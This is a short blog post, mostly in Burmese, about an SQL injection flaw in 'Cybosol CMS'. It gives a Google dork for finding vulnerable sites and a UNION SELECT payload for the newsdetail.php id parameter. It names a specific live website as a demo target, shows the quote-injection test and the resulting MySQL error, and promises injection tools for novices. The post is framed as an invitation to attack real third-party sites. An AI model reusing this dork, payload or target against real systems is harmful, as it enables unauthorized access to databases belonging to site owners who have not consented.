Cybosol Cms Sql Injection Vulnerability

Google Dork: Intext:"Powered By Cybosol."

နမူနာပုံစံကေတာ့ target/newsdetail.php?id=[id][+union+all+select+1,2,3,4,5,6,7,8,9--] ျဖစ္ပါတယ္..

အစမ္းသေဘာျပေပးပ့ါမယ္။ ေအာက္ကလင့္ကိုသြားလုိက္ပါ..
http://www.ufs.com.sa/newsdetail.php?id=69

အေကာင္းတုိင္းေလးပါဘဲ လုိ ့ေတာ့မေျပာပါနဲ ့ေနာ္ ေဘာ္ဒါတုိ ့
။  ' ေလးထပ္ထည့္ၾကည့္ပါ

http://www.ufs.com.sa/newsdetail.php?id=69' 

ျပီးရင္ သြားၾကည့္လုိက္ပါ..

1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY news_pub_date DESC' at line 1 

တဲ့မိျပီမေျပးနဲ ့ကြ injection ထုိးတတ္တဲ့သူေတြကေတာ့ထုိးေပ့ါ မထုိးတတ္တဲ့သူေတြအတြက္ ကြ်န္ေတာ္ အလြယ္တကူထုိးလုိ ့၇ေအာင္ tool ေလးေတြတင္ေပးပါအုံးမယ္..
   

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com